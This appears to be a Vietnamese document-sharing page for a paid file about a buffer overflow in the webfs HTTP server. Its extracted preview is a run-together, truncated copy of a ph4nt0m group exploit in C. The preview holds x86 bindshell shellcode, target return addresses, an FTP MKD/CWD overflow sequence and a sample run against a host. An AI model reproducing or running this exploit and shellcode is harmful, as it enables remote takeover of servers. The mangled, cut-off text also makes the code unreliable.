Lỗi tràn bộ đệm file dài trong webfs

Số trang: 20 Loại file: doc Dung lượng: 37.50 KB Lượt xem: 15 Lượt tải: 0

Jamona

Phí tải xuống: 17,000 VND

Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Webfs ( http://bytesex.org/webfs.html) là một httpd server ,lỗi tràn bộ đệm cho phép kẻ tấn công có thể tạo một thư mụctrên server.
Nội dung trích xuất từ tài liệu:
Lỗi tràn bộ đệm file dài trong webfsLỗitrànbộđệmfiledàitrongwebfstrangnàyđãđượcđọc lầnWebfs(http://bytesex.org/webfs.html)làmộthttpdserver,lỗitrànbộđệmchophépkẻtấncôngcóthểtạomộtthưmụctrênserver.codekhaithácsauđây:/**********************************************************************************hatemoney.ifyouhavemuch.pleaseshit,lol...*onlylove#ph4nt0m(irc.ox557.org)#cheese..(sec..)*page:jsk.ph4nt0m.org*lovetaiwan.nah:(chen&li.godie...........*[root@localhostroot]#./hackh127.0.0.1p80ujska3465008c/*tmp*webfs1.7.x:webserverremotefileoverflowexploit(useftpdtomkdir)*Greetsall#ph4nt0m.*itistooshit.*[+]Hostname:127.0.0.1*[+]Portnum:80*[+]Retaddraddress:0xbfffd838*[1]#1Setcodes.*[*]attemptingtoconnect:127.0.0.1:21.*[*]successfullyconnected:127.0.0.1:21.**PASS3465008*CWD/tmp*MKD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*CWD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*MKD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*CWD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*MKD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*BBBBBBBBBB...*MKD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*CWD*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...*MKD????????????????????????????????????????????????????????*BBBBBBBBB...>*CWD????????????????????????????????????????????????????????*#include#include#include#include#include#include#include#include#include#defineBUFSIZE220#defineBUFSIZE2166#defineBUFSIZE31024#defineD_PORT5803#defineD_HOSTwww.ph4nt0m.org#defineTIMEOUT10#definejretaddr0x80588a8/*Use0x44434241debugx/30000x$eax10000.*/unsignedshortno_io=0;/*donotshowtraffic.*/unsignedintattempts=100;/*numberoftimestobrute.*/unsignedintcolumns=80;/*genericscreenwidth.*/unsignedintftp_i=0;char*user;/*usernametouse.*/char*pass;/*passwordtouse.*/char*writedir;charshell[]=/*bindshell(26112)&,netric.*/x90x90x90x31xdbxf7xe3x53x43x53x6ax02x89xe1xb0x66x52x50xcdx80x43x66x53x89xe1x6ax10x51x50x89xe1x52x50xb0x66xcdx80x89xe1xb3x04xb0x66xcdx80x43xb0x66xcdx80x89xd9x93xb0x3fxcdx80x49x79xf9x52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x52x53x89xe1xb0x0bxcdx80;structop_plat_st{intop_plat_num;char*op_plat_sys;u_longretaddr;intoff_st;};structop_plat_st__pl_form[]={{0,red8.0,0xbfffd838,0},{1,DEADOS,0x44434241,0},NULL};voidfilter_text(char*);voidbanrl();voidx_fp_rm_usage(char*x_fp_rm);unsignedshortsock_connect(char*,unsignedshort);voidgetshell(char*,unsignedshort);voidftp_printf(int,char*,...);voidftp_read(int);voidftp_parse(int);voidprinte(char*,short);voidsig_alarm(){printe(alarm/timeouthit.,1);}voidbanrl(){fprintf(stdout, webfs1.7.x:webserverremotebufferoverflowexploit) );fprintf(stdout,Greetsall#ph4nt0m. );fprintf(stdout,itistooshit. );}voidx_fp_rm_usage(char*x_fp_rm){int__t_xmp=0;fprintf(stdout, Usage:%s[option][arguments] ,x_fp_rm);fprintf(stdout, h[hostname]targethost. );fprintf(stdout, p[port]portnumber. );fprintf(stdout, u[user]user. );fprintf(stdout, a[pass]pass. );fprintf(stdout, c[file]writetmp. );fprintf(stdout, s[addr]&shellcodeaddress. );fprintf(stdout,Example>%shtarget_hostnamep8000ujska1234c/tmptnum ,x_fp_rm);fprintf(stdout,Selecttargetnumber> );for(;;){if(__pl_form[__t_xmp].op_plat_num==(0x82))break;else{fprintf(stdout, {%d}%s ,__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);}__t_xmp++;}fprintf(stdout, );exit(0);}intmain(intargc,char*argv[]){intport=D_PORT;charhostname[0x333]=D_HOST;intwhlp,type=0;unsignedinti=0;charbuf[141];charbuf2[2078];charsendbuf[3150];charbuf3[141];intsd;intftpsd;u_longretaddr=__pl_form[type].retaddr;(void)banrl();while((whlp=getopt(argc,argv,T:t:H:h:u:c:a:P:p:IiXx))!=EOF){externchar*optarg;switch(whlp){caseT:caset:if((type=atoi(optarg))strncpy(hostname,optarg,sizeof(hostname)1);break;caseu:if(!user&&!(user=(char*)strdup(optarg)))printe(main():allocatingmemoryfailed.,1);break;casea:if(!pass&&!(pass=(char*)strdup(optarg)))printe(main():allocatingmemoryfailed.,1);break;casec:if(!writedir&&!(writedir=(char*)strdup(optarg)))printe(main():allocatingmemoryfailed.,1);break;caseP:casep:port=atoi(optarg);break;caseI:ca ...